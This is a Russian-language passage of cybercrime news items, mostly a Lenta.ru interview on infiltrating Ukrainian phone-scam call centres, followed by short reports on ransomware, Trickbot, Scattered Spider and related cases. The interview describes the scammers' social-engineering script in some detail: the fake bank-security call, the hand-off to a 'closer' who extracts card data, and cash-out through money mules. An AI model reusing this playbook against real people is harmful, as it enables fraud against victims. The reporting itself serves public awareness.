Помимо этого, в ходе атаки преступники получили доступ к номерам водительских удостоверений ряда граждан США и Канады.
Продавец украденных данных отметил в беседе с Motherboard, что выставленная на продажу база не содержит номеров водительских удостоверений. По словам злоумышленницы, она просит 4-5 тысяч долларов за скомпрометированную информацию.
Напомним, что в недавней утечке Volkswagen и Audi пострадали более 3,3 миллионов текущих или потенциальных покупателей автомобилей Audi. Больше всего инцидент затронул американских граждан.
Источник: https://www.anti-malware.ru/news/2021-06-18-111332/36176
Руслан Айгинин рассказал о мире украинской преступности.
Большинство россиян сталкивались с телефонными мошенниками, а многие из любопытства пробовали их разговорить. IT-специалист из Москвы Руслан Айгинин решил пойти дальше: он смог войти в доверие к сотруднице одной из мошеннических групп, базирующихся в украинском Днепре, чтобы узнать, как устроена внутренняя кухня, жизнь и досуг «офисников» — именно так называют себя эти люди, образовавшие у себя на родине целую субкультуру. Они снимают видео о разводе россиян-«мамонтов», хвастаются своими запредельными доходами и устраивают вечеринки со стриптизершами в духе фильма «Волк с Уолл-стрит». О своем погружении в мир украинской преступности Руслан рассказал «Ленте.ру».
Руслан Айгинин: Я считаю, что мошенничество не имеет национальности. Это очень важный момент, который хочу отметить сразу. Сейчас происходит геополитический конфликт, и многие россияне полагают, что телефонные мошенники живут только на (или в) Украине. Это не так. Мошенники есть и в России, и в Аргентине, и в Южной Корее, что я могу вам подтвердить на примерах.
Меня всегда интересовали уязвимости. Любого ребенка тянет посмотреть не только, как та или иная штука работает, но и то, как можно нарушить ее работу, взломать, хакнуть. Мне это интересно до сих пор.
Год назад я наткнулся на YouTube-канал «СКАМ: вызов принят!». В описании к роликам говорилось, что любой зритель может прислать свою запись на почту. Мне тоже захотелось записать свое общение с мошенниками и скинуть его на этот канал. Так я и сделал. Скинул и забыл об этом. Через некоторое время мне написала автор канала и попросила записать трейлер к моей записи, так как они ее приняли и захотели опубликовать.
Так появился мой первый ролик в публичном пространстве. Захотелось продолжения. Захотелось понять, как устроены разные виды разводок (лохомагазины, лохоинвестиции и так далее), как они работают, что движет людьми, которые этим занимаются.
Стал изучать Telegram, услуги по взлому аккаунтов, но это было не то. Потерпевшие тут сами нарушают закон, пытаясь взломать аккаунт другого человека, нарушить тайну частной переписки. Копал дальше. Решил изучить тех самых ужасных украинских мошенников, о которых у нас так много говорят. Но для этого нужно было хорошенько подготовиться.
Есть такое понятие, как виртуальная личность, или сокпаппет (sockpappet) Используются такие марионетки обычно CММ-щиками или политагитаторами. Это не просто один левый аккаунт и одна страница в социальной сети или запись на форуме.
Продумывается все: где и как ты живешь, с кем общаешься, где и когда учился, чем занимаешься.
Click to expand...
Я создал две виртуальные личности — двух людей, которые родились и выросли в украинском городе Днепре: 18-летнего юношу по имени Юрий и 21-летнюю Алису. Насколько смог, постарался сам стать «местным», ведь мне же предстояло говорить от их имени. Для этого я изучил историю города, выучил карту. Попросил брата, чтобы тот проверил мои топографические познания.
Это было медленное, глубокое погружение. Я каждый день после пробуждения первым делом смотрел погоду в Днепре или Киеве, куда мои сокпаппеты периодически приезжали. Читал местные новости, Telegram-каналы, паблики в соцсетях. Там и находил контакты «офисов» — именно так сами мошенники называют свои конторы, а себя, соответственно, «офисниками».
Одним из основных источников знаний об этих организациях для меня были беседы с эйчарами, чья основная задача — привлекать новые кадры в свои «офисы». Там большая текучка!
Эйчары общаются с теми, кто звонит и пишет по размещенным в сети объявлениям, выполняют функцию СММ-менеджеров: активно постят разный контент, включая видосы в соцсетях, ведут Telegram-каналы, прямые эфиры, проводят разные конкурсы для подписчиков.
Они же выступают своеобразными амбассадорами «офисов», показывая своим внешним видом и образом жизни, как хорошо зарабатывают сотрудники этих преступных организаций. Обилие фотографий позволяло мне находить их реальные аккаунты, узнавать об их жизни, интересах, связях друг с другом и прочую полезную инфу с помощью OSINT, то есть поиска по открытым источникам данных.
Click to expand...
Конечно, сам я, как незрячий, эти изображения не вижу. Но есть, к примеру, бот «глаз бога», позволяющий улучшать и сравнивать одни картинки с другими. Да, «эйчары» понимают, что ставят себя в опасное положение, и шифруются, но зачастую некачественно. К примеру, используют один логин на страницах якобы разных людей в разных соцсетях. Дальше я беру программу, которая позволяет найти углубленную информацию о логине — на каких сайтах используется и так далее. Однако техника техникой, но важнее разговор с человеком.
Первое время я общался с эйчарами от лица Юрия. Это наивный 18-летний парень, у которого только девять классов за плечами. Он ни в чем особенно не соображает, но хочет быть крутым, хочет научиться скамить людей, ну и заработать. Тут был соблазн переборщить с идиотизмом, но собеседники могли заподозрить неладное.
Гораздо успешнее, как ни странно, оказалось погружение в виртуальную личность девушки — 21-летней Алисы. Она куда более сообразительная, уже что-то понимает в IT и хочет развиваться дальше.
Как Юрию и Алисе мне приходилось делать вид, будто бы я разделяю взгляды своих собеседников, в частности, их ненависть к русским, которой там очень много! Это давалось мне труднее всего. Конечно, я сам не заводил речь на тему политики и национальностей, но поддакивал их репликам, от которых порой в прямом смысле становилось дурно.
Хочу, однако, подчеркнуть, что и в России ненависти к украинцам хватает. И в той, и в другой стране, как мне кажется, ненависть идет не только и не столько изнутри каждого человека, сколько насаждается извне. Ею пропитано все инфополе. Ужасно, что речь идет именно о ненависти к национальности. Ведь тем же мошенникам все равно, воюет ли человек, которого они разводят, поддерживает ли он СВО или просто работает сантехником и не читает никаких новостей.
Но вернемся к этим диалогам. Чтобы не завраться, я часто говорил правду, рассказывал о чем-то, что реально происходило в моей жизни, к примеру, про то, как учился играть на скрипке.
Эксперименты с виртуальными личностями могут не довести до добра. Со временем мне стало сниться, будто я случайно выдал себя, записав голосовое сообщение, а однажды так чуть не произошло и в реальности. Вроде бы ничего особенного я не делал, но внутреннее напряжение постепенно возрастало.
А еще произошло такое, что я стал симпатизировать одной из эйчарок — вернее, посочувствовал. Моя Алиса общалась с ней всю весну, и речь уже фактически шла о дружбе.
Эту девушку зовут *****, она работает эйчаром в офисе уже больше года. От ***** мне удалось получить не только фото и видео, но и личный аккаунт в телеге и номер банковской карточки. Добился я этого тем, что, почувствовав доверие — ну и банальную жажду заработка, — предложил ей халтурку. Рассказал, что пишу сайт для магазина одежды, предложил выступить в роли тестировщика. Она согласилась. Даже появилась мысль реально написать такой сайт и прислать ей денег, чтобы расположить еще ближе. Но потом стало ясно, что ***** уже рассказала мне об «офисах» все, что знала. Продолжать общение смысла не было.
Я стал ее игнорировать, все реже интересуясь ее делами. Она постоянно спрашивала о сайте: когда запустится и так далее. Я боролся с желанием донести до этой девушки мысль, что ей надо увольняться, что работать в мошеннической конторе — это чистое зло, которое не прикроешь никакими благими намерениям. Зло и для тех, кого они обманывают, и для нее самой.
В итоге я написал ей со своего личного, настоящего аккаунта: «Я знаю, кто ты и чем занимаешься. Увольняйся». А чтобы она поняла, что я ее действительно знаю, передал привет от ее парня, который служит в ВСУ.
Затем я выложил в своем Telegram-канале ее видео и фото с подписью, кто она и чем занимается — правда, фамилию немного изменил. Она об этом узнала каким-то образом или же поняла, что Алиса — это развод. И написала Алисе прощальное сообщение: «Иди на ***, тварь русская».
Выше этого текста мы еще мирно, как две подружки, обсуждали какую-то очередную «воздушку» (воздушную тревогу — прим. «Ленты.ру») в Днепре.
Затем ее «офис» снес свой канал на YouTube, в TikTok и Telegram, а потом, как я понял, cменил и реальный адрес местонахождения.
Итак, в «офисы» активно набирают молодежь с 16 лет. Главное, чтобы кандидат был готов звонить и скамить людей. Работать нужно в реальном офисе, где оборудован кол-центр. График у большинства вполне обычный офисный — с 9 до 18, с понедельника по пятницу. Бесплатный обед. Иногородним сотрудникам контора оплачивает жилье.
Новичок сперва проходит обучение, где ему, к примеру, рассказывают о «мамонтах», или «лохматых» — так называют людей, которых разводят. Кстати, работать звонилкой — это у них между собой называется «на офисе закрывать трубочку».
В плане методичек или скриптов у них все довольно грубо и примитивно. «Мамонтов» делят на: «активных ******* [дебилов]», «пассивных ******* [дебилов]», «плугов», «профессоров» и «чемпионов». Задача мошенника, которому удалось завязать разговор с будущей жертвой, — определить, к какому типу тот относится, и вести себя с ним соответственно
Click to expand...
«Активных ******* [дебилов]» надо хвалить и аккуратно осаживать: «Тут ты знаешь, но тут работает вот так», — человек должен увидеть, что в чем-то ты разбираешься лучше, и начать тебе верить.
«Плуг» — это трудяга, который готов говорить часами, но только о работе и семье. «Профессор» соображает только в одной сфере. Его принято слушать и поддакивать. «Чемпион» похож на профессора и «активного ******* [дебила]» одновременно. С ним труднее, а хуже всего или почти безнадежно общаться с «пассивным ******* [дебилом]».
Скрипты, схемы или, скажем так, маршруты, по которым выстраивается общение с «мамонтом», у «офисников» тоже весьма примитивные и явно не подвергаются значительному апгрейду. Здесь больше ценят объем, то есть число обзвоненных людей, да и текучка кадров не позволяет массово выращивать Остапов Бендеров.
Итак, вот как выглядит типичный схематос глазами «офисников». Человек, который занимает самую низкую должность (а ее здесь называют «аккаунт-менеджер»), валом обзванивает людей, представляясь сотрудником банка.
Он пересказывает своим собеседникам одну и ту же историю. К примеру, про человека, который якобы пришел от них в банк с доверенностью и пытался снять деньги. От «мамонта» на этом этапе не требуют передачи каких-либо сведений. Просто добиваются согласия на замораживание счета, а затем переключают на второго сотрудника.
Подключается второй тип звонилки — его называют «клоузер». Этим уже занимаются более опытные, продвинутые и талантливые «офисники». Именно на данном этапе от «мамонта» необходимо получить номер банковской карты, ее срок действия и код CVC.
Жертве диктуют номер счета «дропа» — эти карты покупают пачками через даркнет, но иногда это и реальные россияне с банковской картой, которые сотрудничают с мошенниками за вознаграждение. К слову, деньги от «дропа» в «офис» попадают через криптообменники.
Если человек готов передать солидную сумму, но только налом, к нему могут снарядить «дроп-курьера» — это россиянин типа закладчика наркотиков, который сотрудничает с украинскими «офисами» вслепую (получая анонимные заказы) или даже сознательно.
За тем, как трудится аккаунт-менеджер и «клоузер», в «офисе» пристально наблюдает «фермер» — это высшая точка карьерного роста для сотрудника, которого наняли с улицы. «Фермер» должен поддерживать некую минимальную планку качества работы, чтобы коллеги «не шокали» и другими элементарными способами не палили контору.
Click to expand...
Информация о самых вкусных лохах, которых удалось развести на значительную сумму, тут же передается звонилкам, представляющимся жертвам борцами с мошенничеством. Они выгребают из людей то, что у них еще осталось, или уговаривают взять еще один кредит — якобы для того, чтобы вернуть утраченное прежде и наказать виновных. Такая адская карусель получается.
Атмосфера, организация работы и характер отношений сотрудников в каждом конкретном офисе может отличаться. Это непохоже на некую централизованную систему с единым управлением. Скорее на кофейни, где главное — найти помещение, нанять сотрудников, купить хорошую технику, научиться правильно обжаривать зерна и освоить методику приготовления напитков. Основные затраты «офисов» мошенников связаны с зарплатным фондом, взятками силовикам, оплатой оборудования, всевозможных баз данных, IP-телефонии с подставными номерами и другого софта. Техчасть у них мощная!
Днепр — столица «офисников». Там их больше всего. А вообще на Украине таких «офисов» сотни. Соответственно, трудятся в них десятки тысяч молодых людей.
Как вы уже заметили выше, у них есть свой жаргон — это уже целая молодежная субкультура. И она не достигла своего пика. Она продолжает расти.
Интересно, что у значительной части населения Украины к подобным «офисам» негативное отношение. Одним, разумеется, не нравится, что речь идет об организованной преступности. Других смущает то, как в «офисах» относятся к рядовым сотрудникам.
Есть стереотип, что звонилок держат в ежовых рукавицах, жестоко наказывая за провинности, не позволяя уволиться по собственному желанию. Эйчары активно борются с негативным общественным мнением.
Вот фрагмент разговора, по которому можно понять, что ****** всегда держит в уме такой негатив, и пытается подсказать Алисе, как вести себя с родителями, не желающими, чтобы их дочь становилась мошенницей.
Алиса (Роман):Слушай, у меня проблема. Даже не знаю, как тебе ее описать. Короче: мои родственники против, чтобы я к вам устраивалась. И я не знаю, как мне в такой ситуации поступить... Разругались. Сижу реву.
******:_Можешь сказать, что пойдешь на другую работу. Там, не знаю, сисадмином... Понимаешь, в чем вопрос? Им не нравится специфика? То, что это офис? Или им не нравится, что ты будешь звонить? Нужно понимать, в чем. Я просто говорила, что иду в рекламное агентство. Вот и все. Здесь на самом деле ничего сложного нету. Надо сначала выслушать.
Помимо того, помогаешь стране. То, что я написала, что мы донатим ЗСУ — это не сказки, а реально так оно и есть. Мы также снимаем TikTok, и те деньги, которые с него заработаем, отправим ЗСУ. Себе вообще ни копейки.
Плюс я тут ничего не считаю зазорным. Как минимум это своеобразная месть. Ну и во-вторых — это хорошие деньги._
Однако факты рабского труда или чего-то наподобие того применительно к «офисам», скорее всего, существуют. Хотя бы потому, что СБУ периодически закрывает подобные конторы из-за жалоб родственников сотрудников.
Конечно, «офисы» работают под крышей полиции и СБУ, то есть платят им взятки, чтобы их не трогали, но все же, как и в случае с другой преступностью, эта крыша не работает со стопроцентной гарантией. В «офисы» могут нагрянуть оперативники со спецназом: проводят обыск, изымают технику. А потом — видимо, по звонку — все это возвращается.
В любом случае «офисники» опасаются наблюдения или внедрения к ним полицейских. Именно на проверку кандидатов в «офис» по слитым базам сотрудников МВД и СБУ делается акцент при приеме на работу. Проверяют не по имени и фамилии, а по фотографии, пользуясь программами для сравнения снимков. От кандидатов в «офисы» требуют ДИА — это паспорт-карточка, в котором можно замазать цифры и ФИО. Я спрашивал, зачем, и мне прямо отвечали: «Чтобы убедиться, что ты не мент».
Пожалуй, главное, в чем я убедился, это что «месть русским» или «поддержка ЗСУ» — это ширма, в которую и сами «офисники» верят с трудом. Особенно те, кто поработал подольше.
Click to expand...
Дело в простой и удачной схеме, когда ты обманом отнимаешь деньги у граждан другой страны, говорящих с тобой на одном языке. Украинскую полицию не беспокоит судьба потерпевших в России, как и украинские пострадавшие — российскую полицию.
Добавлю, что «офисники» разводят не только русских, как они утверждают, а любых русскоязычных людей, вне зависимости от их национальности и местонахождения. «Офисники» звонят не только в Россию, но и в Казахстан, в страны Прибалтики и даже Западной Европы. Есть и англоязычные звонилки, которые работают по всем, кто, соответственно, разговаривает на английском, просто их еще немного.
Поддержка ЗСУ — это миф, с помощью которого «офисники» пытаются исправить отношение к ним украинцев, но это не очень-то работает на взрослую публику, в основном — на подростков и молодежь, зрителей роликов и прямых эфиров эйчаров в соцсетях.
Сказки заканчиваются, когда человек приходит работать в «офис». Если тебя обучили, вложили деньги в твое жилье, обеды, игры в приставки (такое там тоже есть), то ты обязан отработать какое-то время. Если захочешь свалить раньше, то тебя оштрафуют, а не заплатишь — то... кто знает, что с тобой будет в условия боевых действий.
Сидеть на окладе не получится, так как это 10-15 тысяч гривен (22 600 — 33 900 рублей). Приходится стараться, чтобы получать процент с «закрытой трубки», а еще без конца врать родителям, что работаешь в другом месте.
Но, как бы там ни было, я не жалею людей, которые решили профессионально заниматься мошенничеством по якобы благородным мотивам. Напомню свою позицию: у мошенников нет национальности.
Сейчас я переключился на изучение других видов современного технологичного мошенничества, которым занимаются россияне. Цель этого моего хобби в том, чтобы внести свой вклад в борьбу с этим злом. Предупрежден — значит вооружен.
Первое знакомство корреспондента «Ленты.ру» с Русланом произошло на гоночном треке в Подмосковье, куда он приехал, чтобы попробовать свои силы в картинге. Руслан какое-то время даже работал курьером, чтобы научиться вслепую ориентироваться и передвигаться по городу без каких-либо затруднений. Также он успешно освоил профессию программиста, продолжает одновременно учиться и работать.
source: lenta.ru/articles/2023/07/05/officeman
Роскомнадзор направил госкомпаниям письма с предупреждениям, что в сентябре протестирует блокировку ряда иностранных интернет-протоколов, скрывающих имя сайта и препядствующих отслеживанию пользователей, включая DoH(DNS over HTTPS), который внедряют Mozilla и Google.
Также будут заблокированы DNS Google и Cloudflare.
Ведомство также сообщило о необходимости всем компаниям перейти на Национальную систему доменных имён.
По мнению экспертов: Блокировка современных протоколов шифрования приведет к снижению приватности и безопасности в рунете. А множество браузеров и устройств перестанут работать.
Сотрудники Национального криминального агентства Великобритании деанонимизировали троих основателей сервиса, основной услугой которого было получение одноразовых кодов доступа к банковским счетам с помощью методов социальной инженерии. В официальном пресс-релизе уточняется, что речь идет о портале OTP.Agency.
«Этот веб-сайт был, по сути, универсальным магазином, который предоставлял инструменты, упрощавшие преступникам доступ к банковским счетам их жертв и кражу денег с них», — заявила глава отдела по борьбе с киберпреступлениями Анна Смит (Anna Smith).
Сервис функционировал с сентября 2019 года. Следователи обратили на него внимание лишь спустя 10 месяцев, а арест был произведен в марте 2021 года. При этом перед судом обвиняемые предстанут лишь в апреле 2023 года. Самому молодому из них — Азе Сиддеку (Aza Siddeeque) — на момент открытия портала было лишь 14 лет. На год старше его второй член сообщества — Виджаясидхуршан Виджаянатан (Vijayasidhurshan Vijayanathan), а третьему члену группы — Каллуму Пикари (Callum Picari) — тогда было 17. Суммарно их жертвами, согласно данным следствия, стали более 12,5 тысячи человек. Детали об украденных с помощью сервиса суммах не разглашаются.
source: nationalcrimeagency.gov.uk/news/three-charged-over-online-banking-scam
На этой неделе обострился конфликт между WordPress, Automattic (владелец WordPress.com и WooCommerce) и крупным хостинг-провайдером WP Engine. Разработчики WordPress заблокировали доступ к ресурсам WordPress.org для WP Engine и его клиентов, прекратив обновление плагинов. Пользователям WP Engine рекомендовали выбрать другого хостинг-провайдера.
Разработчики WordPress утверждают, что вынуждены пойти на такой шаг из-за изменений, которые WP Engine вносит в основную функциональность WordPress ради получения прибыли, а также из-за блокировки новостного виджета в панели управления тысяч сайтов, чтобы критика действий WP Engine не доходила до конечных пользователей.
Этот конфликт продолжается уже некоторое время. Недавно сооснователь и глава WordPress Мэтт Мулленвег (Matt Mullenweg) [назвал](https://wpengine.com/wp- content/uploads/2024/09/Cease-and-Desist-Letter-to-Automattic-and-Request-to- Preserve-Documents-Sent.pdf) WP Engine «раковой опухолью» и обвинил компанию в получении прибыли от WordPress и использовании бренда без какого-либо вклада в развитие CMS. Мулленвег добивался, чтобы WP Engine платила лицензионные отчисления за торговую марку. По его мнению, такой финансовый вклад был бы соизмерим с выгодами, которые WP Engine получает от проекта.
Однако представители WP Engine платить отказались, а после публичной критики от Мулленвега направили в Automattic [письмо](https://wpengine.com/wp- content/uploads/2024/09/Cease-and-Desist-Letter-to-Automattic-and-Request-to- Preserve-Documents-Sent.pdf) с требованием прекратить противоправные действия. WP Engine обвинила Мулленвега в попытке вынудить компанию платить миллионы за лицензию на товарный знак, а также заявила, что в противном случае к ней обещали применить «тактику выжженной земли».
На это Automattic ответила собственным предупредительным письмом, в котором обвинила WP Engine в нарушении прав на коммерческое использование торговых марок WordPress и WooCommerce, а также заявила, что компания построила свой бизнес с ежегодным доходом в 400 млн долларов за счет несанкционированной эксплуатации имени WordPress.
Теперь же Мулленвег и вовсе заявил, что если WP Engine отказывается платить, то она не должна иметь возможности пользоваться ресурсами WordPress.org.
«WP Engine хочет контролировать ваш опыт работы с WordPress. Тогда им понадобится собственная система авторизации пользователей, серверы обновлений, плагины, темы, шаблоны, блоки, переводы, фотографии, job board, митапы, конференции, баг-трекер, форумы, Slack, Ping-o-matic и шоукейс. Их серверы больше не могут получить бесплатный доступ к нашим», — пишет Мулленвег в официальном заявлении о блокировке.
Click to expand...
В своем сообщении Мулленвег советует клиентам WP Engine обращаться в службу поддержки WP Engine, если у них возникают проблемы с сайтами на WordPress.
WP Engine, в свою очередь, опубликовала краткое уведомление для своих клиентов: «WordPress.org заблокировал клиентам WP Engine возможность обновлять и устанавливать плагины и темы через WP Admin».
В сущности, этот виток конфликта оставляет тысячи пользователей без обновлений. Как следствие, миллионы людей могут подвергаться рискам атак и взломов.
Судя по обсуждениям на Reddit, далеко не все пользователи WordPress согласны с решением Мулленвега и его кампанией против WP Engine. Так, в сообществе идут обсуждения создания форка WordPress, а также многие возражают против бана WP Engine.
Источник: https://xakep.ru/2024/09/26/wordpress-vs-wp-engine/
Согласно отчету ФБР об интернет-преступлениях за 2020 год, прошлый год стал рекордным по размерам ущерба от киберпреступности.
Как сообщается в отчете, в 2020 году ФБР получило 791 790 жалоб на кибер- и интернет-преступления – на 69% больше по сравнению с 2019 годом, когда была зарегистрирована 467 361 жалоба. Также увеличился размер потерь от такого рода преступлений. Согласно отчету, в прошлом году ущерб от киберпреступности достиг $4,2 млрд – на 20% больше, чем в 2019 году ($3,5 млрд). Обе цифры, количество жалоб и общие убытки, растут уже пятый год подряд.
Как и в прошлые годы, наиболее успешными являются киберпреступные группировки, занимающиеся BEC-атаками (business email compromise – компрометация деловой почты) и EAC-атаками (email account compromise – компрометация электронной почты). В 2020 году на них пришлось 43% от всех потерянных в результате деятельности киберпреступников средств – $1,8 млрд.
BEC/EAC-атаки базируются на взломе учетной записи электронной почты пользователя ради последующего использования личности этого пользователя для обмана других (сотрудников или деловых партнеров) с целью отправки средств на счет злоумышленника.
Помимо BEC/EAC-атак, ФБР также зафиксировало стремительный рост потерь от атак с использованием вымогательского ПО. Согласно отчету, общая сумма ущерба увеличилась на 225% – с $8,9 млн в 2019 году до примерно $29,1 млн в 2020 году.
• Source: https://www.ic3.gov/Media/PDF/AnnualReport/2020_IC3Report.pdf
Согласно исследованию аналитической компании Chainalysis, за прошлый год операторы вымогательского ПО получили выкупов на сумму, превышающую 350 000 000 долларов. Эта неутешительная статистика была собрана путем наблюдения за транзакциями биткоин-адресов, связанных с атаками различных шифровальщиков.
Хотя специалисты Chainalysis обладают одним из наиболее полных наборов данных о преступлениях, связанных с криптовалютами, компания подчеркивает, что, вероятно, эта оценка отражает лишь нижнюю границу суммы, «заработанной» хакерами. Дело в том, что далеко не все жертвы публично сообщали об атаках вымогателей и выплате выкупов, так что реальные доходы злоумышленников могут многократно превышать известные исследователям суммы.
В 2020 году атаки шифровальщиков составили лишь 7% от общего числа преступлений, связанных с криптовалютами, однако при этом общая сумма выплаченных выкупов возросла на 311% по сравнению с 2019 годом. Аналитики объясняют это очень просто: количество шифровальщиков по-прежнему растет, и на рынке появились не только новые угрозы, чьи операторы требуют гигантские суммы у пострадавших компаний, но и несколько ранее известных вредоносов резко увеличили свою активность и прибыли.

По данным Chainalysis, самыми прибыльными операциями в прошлом году могли похвастаться такие хак-группы, как Ryuk, Maze (уже неактивна), Doppelpaymer, Netwalker (недавно власти предприняли попытку его ликвидации), Conti и REvil (он же Sodinokibi). Миллионы долларов своим операторам также принесли вымогатели Snatch, Defray777 (RansomExx) и Dharma.

Основываясь на информации о том, как жертвы платили выкупы, а также как росла и падала прибыль в сфере RaaS (Ransomware-as-a-Service, «Вымогатель как услуга»), эксперты делают вывод, что в целом вымогательская сцена насчитывает куда меньше злоумышленников, чем предполагалось изначально. Дело в том, что преступники постоянно переключаются с одного RaaS на другой.
Что касается отмывания поученных денег, хакеры по-прежнему пользуются для этого специальными миксер-сервисами, а затем переправляют криптовалюту как на законные и известные обменники, так и на высокорисковые сервисы для конвертации в фиат. Так, отчет Chainalysis гласит, что 82% всей «выручки» вымогателей в 2020 году прошло всего через пять обменных порталов. Теоретически в будущем правоохранительные органы могут оказать давление на эти биржи и тем самым повлиять на работу множества шифровальщиков.

Источник: xakep.ru/2021/02/02/raas-stats/
Согласно рейтингу американских спецслужб, тройку основных угроз в киберсфере послеКитая и российской внешней разведки замыкает… Нет, неСеверная Корея, и даже неИран.
На удивление - почетное третье место отдано англоязычной группировкеScattered Spider (aka 0ktapus или UNC3944), о чем [рапортовал](https://cyberscoop.com/potent-youth-cybercrime-ring-made-up- of-1000-people-fbi-official-says/)Брайан Ворндран, помощник директора киберотделаФБР, на прошедшей недавно конференцииSleuthcon по вопросам борьбы с киберпреступностью.
Безусловно, оснований для столь значимой номинации по версииФБР более чем, на счетуScattered Spider внушительный послужной список известных компаний, включая гигантов казиноMGM Resorts и Caesars Entertainment, а также высокотехнологичный конгломератOkta.
По даннымВорндрана, Scattered Spider состоит в основном из жителейСША и Великобритании, а в основе их объединения - более широкое онлайн-сообщество, известное какThe Com.
Хакеры мастерски владеют социнженерией, прокладывая себе лазейки в привилегированные сети и нацеливаясь на службы поддержки и другие ключевые точки доступа.
Бывало доступ натурально выбивали из жертв, работая в формате violence-as-a- service.
Оказавшись внутри,Scattered Spider продемонстрирует высококлассные навыки перемещения по сетям и кражи данных, зачастую привлекая к своим атакам авторитетные банды вымогателей.
Агент описал группу как «очень, очень большую, обширную, распределяемую группу лиц», многие из которых незнакомы напрямую.
Всего же по данным спецслужб,Scattered Spider насчитывает аж 1000 членов.
Что-то подобное мы уже слышали, когда вдруг прозвучали заявления про то, как над кейсомSolarwinds оказывается работали тысячи инженеров русской разведки.
Больше это походит на попытку оправдать собственные провалы в оперативной работе, ведь из 1000 участников до настоящего времени спецслужбамСША и Великобритании почему-то удалось задержать лишь несколько школьников.
Новая функция восстановления ключей вызвала бурю негодования в криптосообществе.
Ledger, французская компания, производящая аппаратные кошельки для криптовалют, столкнулась с негативной реакцией клиентов и криптоэнтузиастов. Поводом для этого стало её заявление в Twitter о том, что у неё всегда была техническая способность устанавливать на свои устройства прошивку, которая позволяет получать доступ к приватным ключам пользователей. Это было сказано в попытке успокоить обеспокоенных новой функцией Ledger Recovery.
Ledger Recovery — это сервис, который запустила компания на этой неделе. Он предназначен для восстановления паролей пользователей, которые потеряли доступ к своим кошелькам. Сервис хранит зашифрованную часть секретной фразы (сид- фразы) пользователя и выдаёт её по запросу с подтверждением личности.
Многие клиенты Ledger и участники криптосообщества раскритиковали нововведение.
«Это полный абсурд — предлагать хранить резервную копию сид-фразы в интернете и предъявлять свой паспорт или удостоверение личности, особенно после недавних утечек данных», — пишут пользователи Reddit. По их мнению, обновление противоречит заявленным Ledger принципам конфиденциальности и безопасности.
В ответ на это Ledger написала в Twitter, что она всегда могла написать прошивку, которая помогла бы извлечь ключи пользователей. Позже твит был удалён.
«Мы всегда имели и имеем возможность создать прошивку, которая даст нам доступ к вашим ключам. Вы всегда доверяли Ledger в том, что она не будет делать этого, знали вы об этом или нет», — говорится в сообщении компании.
«Мы всё это время держали револьвер направленным на вашу голову, но не волнуйтесь, вы же не умерли. Так что нет никаких проблем, если мы продолжим держать этот револьвер», — саркастически отметил один из комментаторов.
Позже Ledger заявила, что её слова «были вырваны из контекста»: по её утверждению, в прошивке кошельков есть уровни защиты и контроля, которые гарантируют, что никто (даже из персонала компании) не сможет опубликовать вредоносную прошивку. На это один из клиентов Ledger ответил, что он покупал не «уровни доступа», а просто аппаратный кошелёк.
«Первый случай в моей памяти, когда компания сама разрушает свою репутацию в прямом эфире», — написал один из пользователей в теме обсуждения Ledger Recovery.
Некоторые пользователи Ledger Nano считают, что запуск обновления — это один из логичных шагов по усилению регулирования криптоиндустрии. Пользователи на Reddit опасаются, что рано или поздно правительства потребуют подобных мер от всех поставщиков криптоуслуг.
©securitylab
Изданию Wired удалось ознакомиться с ранее неопубликованными документами, содержащими сотни сообщений, которыми обменивались между собой участники нашумевшей кибервымогательской группировки Trickbot. Внутренняя переписка одного из ключевых участников группировки под псевдонимом Target с подельниками за период с лета по осень 2020 года проливает свет на то, как группировка была устроена и как действовала. Через несколько месяцев Киберкомандование США ликвидировало большую часть инфраструктуры Trickbot и временно сорвало ее операции.
Группировка известна тем, что не брезгует атаками на медицинские учреждения, хотя для многих кибервымогателей это табу. Судя по переписке, Trickbot готовилась атаковать медучреждения по всей территории США. Кибервымогатели руководствовались простой логикой – на пике пандемии Covid-19 больницы будут очень быстро реагировать и платить выкуп, чтобы как можно скорее вернуться к работе. В частности, Target предоставил список из 428 больниц и завил, что «скоро начнется паника».
Костяк группировки составляют пять ключевых участников. Каждому участнику отведена своя роль – кто-то руководит командами разработчиков, а кто-то ответственен за развертывание вымогательского ПО. Главой организации является некто Stern.
В переписке от 20 августа 2020 года, Target отчитывался перед Stern о планах Trickbot в ближайшие недели расширить свои операции. В частности, к концу сентября планировалось открыть шесть офисов на 50-80 человек и не где-нибудь, а в Санкт-Петербурге. По мнению главы отдела аналитики ИБ-компании Mandiant Кимберли Гуди (Kimberly Goody), «вероятнее всего», многие операции Trickbot проводятся именно из этого города.
Согласно переписке между Target и Stern, в середине 2020 года у группировки были три основные статьи расходов. Два офиса (основной и тренировочный) использовались для текущих операций. «Хакерский» офис, насчитывавший более 20 сотрудников, использовался для проведения собеседований, найма на работу, а также для хранения оборудования и размещения серверов.
Судя по тому, что в сообщениях неоднократно упоминались «старшие менеджеры», Trickbot представляла собой нечто наподобие корпоративной структуры, и младший персонал практически никогда не общался со старшим.
За развертывание вымогательского ПО отвечал некто Professor, также имеющий отношение к кибервымогательской группировке Conti.
Помимо Conti, Trickbot «училась сотрудничать» и с другими группировками, в частности с вымогателями Ryuk.
Разработчиков ПО группировка нанимала через объявления на форумах в даркнете, а также на открытых русскоязычных сайтах для фрилансеров. Конечно, на сайтах в открытом интернете не сообщалось, что соискателям предлагается работа в киберпреступной организации. Например, в одном объявлении требовался опытный специалист в области реверс-инжиниринга со знанием C++, якобы для работы над созданием web-браузеров для Windows.
Процесс отбора кандидатов проходил в несколько этапов, чтобы отсеять тех, у кого нет достаточно необходимых навыков, а также сотрудников ИБ-компаний, работающих «под прикрытием».
Несмотря на недавние аресты участников кибервымогательских группировок, Trickbot, похоже, никуда не делась. Наоборот, по словам старшего консультанта по безопасности IBM Security Лимор Кессем (Limor Kessem), к концу прошлого года группировка усилила свои операции. С начала 2022 года группа безопасности IBM наблюдает, как Trickbot активизирует свои усилия по обходу средств защиты и сокрытию своей деятельности.
• Source: <https://www.wired.com/story/trickbot-malware-group-internal- messages/>
Обнаружен образец BazarBackdoor, написанный на Nim (ранее Nimrod). По всей видимости, создатели зловреда перешли на экзотический язык программирования, чтобы надежнее спрятать свое детище от антивирусных сканеров.
Вредоносная программа BazarBackdoor, она же BazarLoader, была создана авторами TrickBot, чтобы облегчить горизонтальное перемещение по сети после первоначального взлома. Этот выполняемый в памяти загрузчик с функциями бэкдора открывает удаленный доступ к зараженной системе и способен по команде выполнять в ней различные действия.
Распространяется BazarBackdoor, как и другие инструменты этой преступной группы, через email-рассылки. Вредоносные письма обычно имитируют ответ HR или юриста компании сотруднику, которого якобы собираются уволить. Чтобы ознакомиться с копией приказа, получателю предлагается пройти по указанной ссылке.
